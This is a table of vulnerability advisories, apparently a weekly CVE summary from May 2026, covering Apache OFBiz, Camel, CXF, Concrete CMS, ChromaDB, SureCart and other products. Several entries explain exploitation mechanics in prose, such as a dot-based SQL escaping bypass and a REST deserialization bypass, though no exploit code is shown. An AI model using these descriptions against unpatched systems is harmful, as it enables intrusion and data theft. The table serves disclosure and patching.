| Altium--Altium Enterprise Server | A path traversal vulnerability exists in the Altium Enterprise Server Viewer StorageController due to improper handling of file path route parameters. On on-premise deployments that use local filesystem storage, a regular authenticated user can supply a URL-encoded absolute path (such as an encoded drive letter) in a Viewer storage API request, causing the configured storage root to be discarded and allowing arbitrary files to be read from the server filesystem. Because the readable files include the server's master configuration, which stores database credentials, signing key locations, certificate passwords, and OAuth secrets, exploitation can lead to disclosure of all server secrets and full compromise of the server and its data. Cloud deployments are not affected, as they use object storage and do not enable this component. | 2026-05-20 | not yet calculated | CVE-2026-9129 | https://www.altium.com/platform/security-compliance/security-advisories |
| AMD[.]com--AMD EPYC 4004 | Improper input validation in the System Management Mode (SMM) communications buffer could allow a privileged attacker to perform an out of bounds read or write to a limited section of the Top of Memory Segment (TSEG) memory region, potentially resulting in loss of confidentiality or integrity. | 2026-05-19 | not yet calculated | CVE-2024-36343 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3030.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html |
| Apache Software Foundation--Apache Airflow Amazon provider | In the AWS Secrets Manager and SSM Parameter Store secrets backends of `apache-airflow-providers-amazon` prior to 9.28.0, the team-scoping logic could resolve a `conn_id` containing a `/` (e.g. `"my_team/conn"`) to the same path as another team's team-scoped secret when the caller had no team context. A privileged caller without team context could therefore retrieve another team's secret by crafting a colliding `conn_id`. Fixed in 9.28.0 by switching the team-scope separator to `--` and rejecting team-shaped `conn_id`s when team context is absent. Affects the experimental multi-tenant teams feature only. Users are recommended to upgrade to `apache-airflow-providers-amazon` 9.28.0, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-42526 | https://github.com/apache/airflow/pull/65703 https://lists.apache.org/thread/0092sz5g520d3qqjb01wd61myqlgjtyn |
| Apache Software Foundation--Apache Airflow CNCF Kubernetes provider | JWT tokens that were used by workers in Kubernetes Executors have been exposed to users who had read-only access to Kubernetes Pods. This could allow users with just read-only access to perform actions that were only available to running tasks via the Task SDK and potentially allow them to modify the state of tasks in the Airflow database. | 2026-05-19 | not yet calculated | CVE-2026-27173 | https://github.com/apache/airflow/pull/60108 https://lists.apache.org/thread/pk3m2z4s2rkmc0v6gh9hnch9spc6stqw |
| Apache Software Foundation--Apache Camel | Camel-CXF and Camel-Knative Message Header Injection via Missing Inbound Filtering. The CXF and Knative HeaderFilterStrategy implementations (CxfRsHeaderFilterStrategy in camel-cxf-rest, CxfHeaderFilterStrategy in camel-cxf-transport, and KnativeHttpHeaderFilterStrategy in camel-knative-http) only filter outbound Camel-internal headers via setOutFilterStartsWith, while not configuring inbound filtering via setInFilterStartsWith. As a result, an unauthenticated attacker can inject Camel-internal headers (e.g. CamelExecCommandExecutable, CamelFileName) via HTTP requests to CXF-RS or CXF-SOAP endpoints. When a route forwards messages from these endpoints to header-driven components such as camel-exec or camel-file, the injected headers override configured values, enabling remote code execution or arbitrary file writes. This is the same pattern that was previously addressed in camel-undertow (CVE-2025-30177), the broader incoming-header filter (CVE-2025-27636 and CVE-2025-29891), and non-HTTP strategies (CVE-2026-40453). This issue affects Apache Camel: from 3.18.0 before 4.14.6, from 4.15.0 before 4.18.2. Users are recommended to upgrade to version 4.19.0, which fixes the issue. If users are on the 4.18.x LTS release stream, they are suggested to upgrade to 4.18.2. If users are on the 4.14.x LTS release stream, they are suggested to upgrade to 4.14.6. | 2026-05-19 | not yet calculated | CVE-2026-47323 | https://camel.apache.org/security/CVE-2026-47323.html |
| Apache Software Foundation--Apache Camel K | (Externally Controlled Reference to a Resource in Another Sphere), (Authorization Bypass Through User-Controlled Key) vulnerability in Apache Camel K. Authorized users in a Kubernetes namespace can create a Build resource, controlling the Pod generation in a namespace of their choice, including the operator namespace. This issue affects Apache Camel K: from 2.0.0 before 2.8.1, from 2.9.0 before 2.9.2, from 2.10.0 before 2.10.1. Users are recommended to upgrade to version 2.10.1 (or 2.8.1 or 2.9.2), which fixes the issue. | 2026-05-21 | not yet calculated | CVE-2026-45760 | https://camel.apache.org/security/CVE-2026-45760.html |
| Apache Software Foundation--Apache CXF | The fix for CVE-2025-48913: Apache CXF: Untrusted JMS configuration can lead to RCE was not complete, meaning that another path in the code might lead to code execution capabilities, if untrusted users are allowed to configure JMS for Apache CXF. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue. | 2026-05-22 | not yet calculated | CVE-2026-44417 | https://lists.apache.org/thread/bqg6gjy2cx7rfyqjxcpv3jwjvmclvz4o |
| Apache Software Foundation--Apache CXF | Insecure XML parser configuration in Apache CXF's WS-Transfer module may allow attackers to perform XXE attacks. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue. | 2026-05-22 | not yet calculated | CVE-2026-44618 | https://lists.apache.org/thread/c7vb015f8ljmjl44030mn0yfq71f7sd7 |
| Apache Software Foundation--Apache CXF | An LDAP injection vulnerability in the LDAP Certificate repository of the XKMS server in Apache CXF may allow an attacker to retrieve arbitrary certificates from the repository. Users are recommended to upgrade to versions 4.2.1, 4.1.6 or 3.6.11, which fix this issue. | 2026-05-22 | not yet calculated | CVE-2026-44930 | https://lists.apache.org/thread/c1zqxppo1m5z3kbdhjn5p991zk09ynkh |
| Apache Software Foundation--Apache Fory | Deserialization of untrusted data in Apache Fory PyFory. PyFory's ReduceSerializer could bypass documented DeserializationPolicy validation hooks during reduce-state restoration and global-name resolution. An application is vulnerable if it deserializes attacker-controlled data using PyFory Python-native mode with strict mode disabled and relies on DeserializationPolicy to restrict unsafe classes, functions, or module attributes. This issue affects Apache Fory before 1.0.0. Mitigation: Users of Apache Fory are recommended to upgrade to version 1.0.0 or later, which enforces DeserializationPolicy validation for the affected ReduceSerializer paths and thus fixes this issue. | 2026-05-21 | not yet calculated | CVE-2026-48207 | https://fory.apache.org/security/#cve-2026-48207-pyfory-reduceserializer-deserializationpolicy-bypass |
| Apache Software Foundation--Apache OFBiz | Improper Neutralization of Special Elements Used in a Template Engine vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. Please note that in the updated version, "Data Resource" records with dataTemplateTypeId = "FTL" are no longer supported. Additionally, in the updated version, the "Ecommerce Customer" security group no longer includes content management grants. Users are advised to remove these permissions from any production site as well. | 2026-05-19 | not yet calculated | CVE-2026-29207 | https://lists.apache.org/thread/3rcrp8bh3x6ovrj5xnc0fm1f0nrn52r0 |
| Apache Software Foundation--Apache OFBiz | Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-29220 | https://lists.apache.org/thread/5hjnmt9no6mmtg8sxq3mhonzff1vkd5m |
| Apache Software Foundation--Apache OFBiz | Server-Side Request Forgery (SSRF) vulnerability in Apache OFBiz via Content component operations. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-29226 | https://lists.apache.org/thread/6707wys8jxzmowxggn4cmtwwk9ygl2tr |
| Apache Software Foundation--Apache OFBiz | Improper Input Validation vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31378 | https://lists.apache.org/thread/cbl8qkqtxv90m6ssfwd58bnoh933v38t |
| Apache Software Foundation--Apache OFBiz | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting'), Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), Improper Control of Generation of Code ('Code Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31379 | https://lists.apache.org/thread/1tcnkxjm0s6n1ohfb21brl25dt0hv9by |
| Apache Software Foundation--Apache OFBiz | Improper Neutralization of Special Elements used in an Expression Language Statement ('Expression Language Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31380 | https://lists.apache.org/thread/v2brvq1tf4q491obkxv8p7fc5qfshc08 |
| Apache Software Foundation--Apache OFBiz | Improper Authentication vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31387 | https://lists.apache.org/thread/3wgybgdvmbfvly24zm4sb4y53fc1pqcf |
| Apache Software Foundation--Apache OFBiz | Improper Access Control vulnerability in Apache OFBiz in multi-tenant deployments. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31388 | https://lists.apache.org/thread/npjchvnpnosoqpto46s2om12jd9s7py7 |
| Apache Software Foundation--Apache OFBiz | Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31906 | https://lists.apache.org/thread/1fblqdo89d3ps8kgtcnkcq8sh7gwkcpn |
| Apache Software Foundation--Apache OFBiz | Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31909 | https://lists.apache.org/thread/0hpopzz1qrhkzsbt3ncofs6qo0545r2h |
| Apache Software Foundation--Apache OFBiz | Server-Side Request Forgery (SSRF) vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31910 | https://lists.apache.org/thread/2smc4c4o056ovd2hoq1l29593y5y29vh |
| Apache Software Foundation--Apache OFBiz | Use of Hard-coded Cryptographic Key vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-31986 | https://lists.apache.org/thread/2hl9xoqm8tq8b22x6vnmtp7tg3opcqgc |
| Apache Software Foundation--Apache OFBiz | Improper Control of Generation of Code ('Code Injection') vulnerability in email services of Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-35086 | https://lists.apache.org/thread/g0s37yhnh2xwfts400crb2w8s337hgjx |
| Apache Software Foundation--Apache OFBiz | Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-41919 | https://lists.apache.org/thread/592czh9o69n74c036vy30fnqknocw74p |
| Apache Software Foundation--Apache OFBiz | Improper Authorization vulnerability in Apache OFBiz Webtools. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-45187 | https://lists.apache.org/thread/pcmfyxjyk7dg0btxqg9h7cr30yg8mr7k |
| Apache Software Foundation--Apache OFBiz | Improper Authentication vulnerability in Apache OFBiz via a password-change logic flaw leading to remote code execution. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-45434 | https://lists.apache.org/thread/yw4owrzl0yho1yx7oqxvr6xjkmln9tq8 |
| Apache Software Foundation--Apache OFBiz | Improper Control of Generation of Code ('Code Injection'), Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection') vulnerability in Apache OFBiz. This issue affects Apache OFBiz: before 24.09.06. Users are recommended to upgrade to version 24.09.06, which fixes the issue. | 2026-05-19 | not yet calculated | CVE-2026-46586 | https://lists.apache.org/thread/7mgjl81nrpxqtfcg6h5qtrx7wztbl4js |
| Apple--Private Cloud Compute Server Software | An attacker in a privileged network position may be able to leak sensitive information. A path handling issue was addressed with improved validation. This issue is fixed in PCC Release 5E290.3. | 2026-05-18 | not yet calculated | CVE-2026-20685 | https://security.apple.com/documentation/private-cloud-compute/releasenotes#darwin-init |
| APScheduler--JSONSerializer and CBORSerializer | The JSONSerializer and CBORSerializer in APScheduler (all versions including 3.10.x and 4.0.0a5) are vulnerable to Remote Code Execution (RCE) via Insecure Deserialization. The unmarshal_object function allows for arbitrary class instantiation and state injection by dynamically importing modules and calling __setstate__ on any class available in the Python environment. An attacker can exploit this by submitting a specially crafted JSON or CBOR payload to an application using these serializers. | 2026-05-19 | not yet calculated | CVE-2026-31072 | https://github.com/agronholm/apscheduler https://gist.github.com/nedlir/11fb77f35a59cbba73392a086b02a9c6 |
| Arm--ArmNN | In Arm ArmNN through 2026-03-27, an integer overflow in TensorShape::GetNumElements() in armnn/Tensor.cpp allows a crafted TFLite model file to bypass buffer size validation and trigger a heap-based buffer over-read during model optimization. The overflow occurs when multiplying tensor dimensions using 32-bit unsigned arithmetic without overflow detection, causing GetNumBytes() to return an understated allocation size. During Optimize()->InferOutputShapes(), the BatchToSpaceNdLayer reads beyond the allocated buffer. | 2026-05-22 | not yet calculated | CVE-2026-42627 | https://github.com/ARM-software/armnn/blob/main/src/armnn/Tensor.cpp https://github.com/ARM-software/armnn/blob/main/src/armnnTfLiteParser/TfLiteParser.cpp |
| awesomemotive--NextGEN Gallery | NextGEN Gallery versions prior to 4.2.1 are vulnerable to authenticated SQL injection via the 'orderby' parameter on the REST API endpoints '/imagely/v1/galleries' and '/imagely/v1/albums'. The root cause is an insufficient sanitization function ('_clean_column()') in the data mapper layer that uses a character blacklist instead of a whitelist approach. This allows an authenticated attacker with the 'NextGEN Gallery overview' capability (assigned to the Administrator role by default) to inject arbitrary SQL into the 'ORDER BY' clause. | 2026-05-20 | not yet calculated | CVE-2026-9059 | https://www.tenable.com/security/research/tra-2026-42 |
| baptisteArno--typebot.io | TypeBot is a chatbot builder tool. Versions 3.15.2 and prior contain a critical stored XSS vulnerability in the app.typebot.io profile picture upload form. The application fails to sanitize or restrict SVG/XML-based uploads and directly renders them when accessed through the domain. By uploading a crafted malicious SVG file containing embedded JavaScript, an attacker will execute arbitrary JavaScript code. This vulnerability directly enables stored XSS exploitation because the payload is persistently stored on your infrastructure (app.typebot.io) and accessible from a public-facing, permanent link. Stored XSS via malicious SVG uploads to app.typebot.io allows attackers to execute arbitrary JavaScript in victims' browsers, enabling session/token theft, account takeover, and exfiltration of sensitive user data. This issue has been fixed in version 3.16.0. | 2026-05-22 | not yet calculated | CVE-2026-39970 | https://github.com/baptisteArno/typebot.io/security/advisories/GHSA-jj87-c343-26vp https://github.com/baptisteArno/typebot.io/releases/tag/v3.16.0 |
| Best Practical--Request Tracker | Request Tracker is vulnerable to a reflected cross-site scripting (XSS) vulnerability via the "Page" parameter in GET requests. An attacker can craft a URL that, when opened, results in arbitrary JavaScript execution in the victim's browser. This vulnerability affects versions from 5.0.4 up to 5.0.9 and from 6.0.0 up to 6.0.2. | 2026-05-21 | not yet calculated | CVE-2026-6841 | https://cert.pl/en/posts/2026/05/CVE-2026-6841 https://requesttracker.com/request-tracker/ https://docs.bestpractical.com/release-notes/rt/5.0.10 https://docs.bestpractical.com/release-notes/rt/6.0.3 |
| BillaBear--BillaBear | BillaBear (all versions prior to Jan 2026) contains a SQL Injection vulnerability in the EventRepository. User-controlled input from metric filter names and aggregation properties is directly interpolated into SQL queries using sprintf() without proper sanitization or identifier quoting. Although filter values are parameterized, the filter identifiers (keys) are not. An authenticated attacker with ROLE_ACCOUNT_MANAGER permissions can exploit this to execute arbitrary SQL commands. | 2026-05-19 | not yet calculated | CVE-2026-31069 | https://gist.github.com/nedlir/a50725b94650467f0593b8f4009ae19e https://github.com/BillaBear/billabear https://gist.github.com/nedlir/2377ba6e7fa2ad957210b52aa8e400d9 |
| brainstormforce--Surecart | SureCart versions prior to 4.2.1 are vulnerable to authenticated SQL injection via multiple parameters ('model_name', 'model_id', 'integration_id', 'provider') on the REST API endpoint '/surecart/v1/integrations/{id}'. The root cause is a flawed escaping bypass in the query builder ('wp-query-builder'). Values passed to the 'where()' method are only sanitized via '$wpdb->prepare()' when they do **not** contain a dot ('.') or the WordPress table prefix ('wp_'). By including a dot anywhere in the payload, an attacker completely bypasses the escaping logic and injects arbitrary SQL into the 'WHERE' clause, allowing full UNION-based extraction of the database. | 2026-05-20 | not yet calculated | CVE-2026-9065 | https://www.tenable.com/security/research/tra-2026-43 |
| Broadcom--Automic Automation | Execution with unnecessary privileges vulnerability in Broadcom Automic Automation Agent Unix on Linux x64, Linux Power 64 BE, Linux Power 64 LE, zLinux (zSeries), AIX, Solaris x64, Solaris Sparc 64 allows Privilege Escalation, Target Programs with Elevated Privileges. This issue affects Automic Automation: < 24.4.4 HF1. | 2026-05-19 | not yet calculated | CVE-2026-8370 | https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/37512 |
| BYD--Atto3 | In BYD Atto3, an attacker can obtain an authentication key, which is permanently valid, through a brute-force attack. The authentication key enables flashing of the Electronic Parking Brake (EPB) and Supplemental Restraint System (SRS) related ECUs. | 2026-05-19 | not yet calculated | CVE-2025-61081 | https://www.notion.so/BYD-Atto3-26215fb6156c8000b338db3c2011f637?source=copy_link https://www.notion.so/CVE-2025-61081-26215fb6156c8000b338db3c2011f637 |
| Centralny Instytut Ochrony Pracy - Państwowy Instytut Badawczy--STER | A SQL injection vulnerability has been identified in STER. Improper neutralization of user-provided input in multiple Search Filters allows for SQL injection attacks. It allows an authenticated attacker to view sensitive data such as data belonging to other users, or any other data that the application itself is able to access. This issue was fixed in version 9.5. | 2026-05-22 | not yet calculated | CVE-2026-25606 | https://cert.pl/posts/2026/05/CVE-2026-25606 https://www.ciop.pl/CIOPPortalWAR/appmanager/ciop/pl?_nfpb=true&_pageLabel=P52000165211572544981480 |
| Centralny Instytut Ochrony Pracy - Państwowy Instytut Badawczy--STER | Use of a weak password encoding algorithm in STER software allows the value of a password to be guessed after analyzing how passwords with known values are encoded. This issue was fixed in version 9.5. | 2026-05-22 | not yet calculated | CVE-2026-25607 | https://cert.pl/posts/2026/05/CVE-2026-25606 https://www.ciop.pl/CIOPPortalWAR/appmanager/ciop/pl?_nfpb=true&_pageLabel=P52000165211572544981480 |
| Centralny Instytut Ochrony Pracy - Państwowy Instytut Badawczy--STER | STER uses unencrypted TCP traffic to transmit data over the network. It allows an attacker to conduct a man-in-the-middle attack and obtain sensitive data such as passwords, personal data, or authentication tokens. This issue was fixed in version 9.5. | 2026-05-22 | not yet calculated | CVE-2026-25608 | https://cert.pl/posts/2026/05/CVE-2026-25606 https://www.ciop.pl/CIOPPortalWAR/appmanager/ciop/pl?_nfpb=true&_pageLabel=P52000165211572544981480 |
| Chroma--ChromaDB | A pre-authentication, code injection vulnerability in version 1.0.0 or later of the ChromaDB Python project allows an unauthenticated attacker to run arbitrary code on the server by sending a malicious model repository and trust_remote_code set to true in the /api/v2/tenants/{tenant}/databases/{db}/collections endpoint. | 2026-05-18 | not yet calculated | CVE-2026-45829 | https://www.hiddenlayer.com/research/chromatoast-served-pre-auth https://github.com/chroma-core/chroma/issues/6717 |
| ClipBucket--ClipBucket v5 v.5.5.2 | An issue in ClipBucket v5 v.5.5.2 allows an attacker to execute arbitrary code via the Authentication interface, login page endpoint and HTTP response security headers components. | 2026-05-22 | not yet calculated | CVE-2026-37470 | http://clipbucket.com https://medium.com/@arpit03sharma2003/cve-2026-37470-clickjacking-vulnerability-in-clipbucket-v5-leads-to-credential-theft-and-8415def7804a |
| CODESYS--Visualization | The affected product may expose credentials remotely between low privileged visualization users during concurrent login operations due to insufficient isolation of authentication data. The vulnerability affects only login operations within an active visualization session. | 2026-05-21 | not yet calculated | CVE-2026-0393 | https://codesys.csaf-tp.certvde.com/.well-known/csaf/white/2026/advisory2026-07_vde-2026-052.json |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to unauthenticated file usage disclosure via a missing permission check in the usage controller. Any unauthenticated visitor can request /ccm/system/dialogs/file/usage/{fID} with any file ID and receive a list of every page that references that file, including page IDs, handles, and full URLs. This includes pages that are otherwise restricted by permissions. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.9 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Eldudareeno for reporting. | 2026-05-21 | not yet calculated | CVE-2026-6826 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | In Concrete CMS 9.5.0 and below, the submit_password() method in concrete/controllers/single_page/download_file.php allows unauthorized file access, since downloading permission-restricted files bypasses the view_file permission check. Files without passwords can be downloaded, and any user who knows a file's password can download a password-protected file regardless of whether they have permission to access the file. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Youssef Eid for reporting. | 2026-05-21 | not yet calculated | CVE-2026-7879 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is subject to Insecure Direct Object Reference (IDOR) in the Express Entry Detail block via the exEntryID parameter. This IDOR leads to unauthorized access to all Express form submissions. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 6.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Madani for reporting. | 2026-05-21 | not yet calculated | CVE-2026-7881 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to unauthorized file deletion due to an Inverted CSRF token check in the DeleteFile controller. The code throws an error when the token IS valid and proceeds with file deletion when the token is invalid or missing. This effectively disables CSRF protection for the file deletion endpoint, allowing cross-site request forgery attacks against users who have permission to edit conversation messages. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with a vector of CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Mandani for reporting. | 2026-05-21 | not yet calculated | CVE-2026-7882 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to IDOR in AddMessage/UpdateMessage via the attachments[] parameter, which can lead to a file permission bypass. The `AddMessage` and `UpdateMessage` conversation controllers accept user-supplied file attachment IDs and load files directly via `$em->find(File::class, $attachmentID)` without checking per-file permissions (`canViewFile()`). A user who can post in any conversation can reference any file in the CMS file manager by its sequential ID, effectively bypassing the file permission system. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with a vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Tristan Mandani for reporting. If a site truly has private files, the owner should set up a private storage location (https://documentation.concretecms.org/user-guide/editors-reference/dashboard/system-and-maintenance/files/file-storage-locations) outside of the webroot so that permissions can be checked on view as well. That way, even if an authorized user attaches a file, or otherwise links to it, unauthorized users won't be able to view the file. | 2026-05-21 | not yet calculated | CVE-2026-7886 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | For Concrete CMS 9.5.0 and below, OAuth 2.0 Authorization-Code Handler Bypasses Account Status. A user with uIsActive=0 (suspended, banned, terminated employee) can still authenticate via OAuth and receive valid API tokens. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N. Thanks 0x4c616e for reporting. | 2026-05-21 | not yet calculated | CVE-2026-7887 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | In Concrete CMS 9.5.0 and below, the RSS Displayer block accepts a feed URL from any page editor and fetches it server-side without validation, enabling redirect-to-internal bypasses. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.1 with a vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:N/VI:L/VA:N/SC:L/SI:N/SA:N. | 2026-05-21 | not yet calculated | CVE-2026-7890 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below fails to sanitize path traversal sequences in the ptComposerFormLayoutSetControlCustomTemplate field when saving page type composer form layouts. An authenticated rogue administrator with composer form editing rights can exploit this to include arbitrary readable files on the server. Combined with the file uploader's extension-only validation (which permits PHP code in files saved with image extensions like .png), this can result in authenticated remote code execution. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 9.4 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8134 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to Remote Code Execution due to insecure deserialization occurring in the ExpressEntryList block controller. A rogue administrator with privileges to add blocks to an area can bypass the intended protection mechanism (_fromCIF === true), which normally restricts malicious inputs over form POST requests, by leveraging the REST API functionality. Because the REST API parses requests using json_decode(), the string "true" is evaluated as a strict PHP Boolean (true). This bypass allows the attacker to inject a malicious serialized payload into the block's filterFields database column. The payload will subsequently be executed when the block's data is viewed or edited by an administrator, leading to complete server takeover (RCE). The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 8.9 with a vector of CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H. Thanks Nguyễn Văn Thiện (https://github.com/Thien225409) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8135 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to Stored XSS via external-link page cvName because updateCollectionAliasExternal bypasses being sanitized. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 2.0 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8139 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below does not validate a CSRF token before processing requests to /dashboard/extend/install/download/<remoteId>. The download() method in concrete/controllers/single_page/dashboard/extend/install.php checks only the canInstallPackages() permission before fetching a remote marketplace package and writing it to the server's DIR_PACKAGES directory. Because the endpoint is a state-changing GET route with no token enforcement, an attacker who can cause an authenticated administrator to visit a crafted page can force an arbitrary marketplace package to be downloaded. In order to be vulnerable, the victim must be passing canInstallPackages() and the site must be connected to the Concrete marketplace. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.5 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks https://github.com/maru1009 for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8140 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below is vulnerable to Stored XSS via the OAuth integration name. The OAuth authorize template renders the integration name (admin-controlled) through Concrete's t() translation helper as a sprintf-style format. The <strong>...</strong> wrap is built by PHP string interpolation before t() runs, so the integration name lands in the translated output as raw HTML. A rogue admin could potentially snoop on login submissions. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.3 with vector CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Yonatan Drori (Tenzai) for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8197 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
| Concrete CMS--Concrete CMS | Concrete CMS 9.5.0 and below has Stored XSS on the height parameter. The controller does not validate or sanitize $height. Any user with editor privileges can inject malicious JavaScript that executes in the context of any visitor's browser, potentially leading to session hijacking, credential theft, or other malicious actions. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 7.3 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N. Thanks Alfin Joseph for reporting. | 2026-05-21 | not yet calculated | CVE-2026-8203 | https://documentation.concretecms.org/9-x/developers/introduction/version-history/951-release-notes |
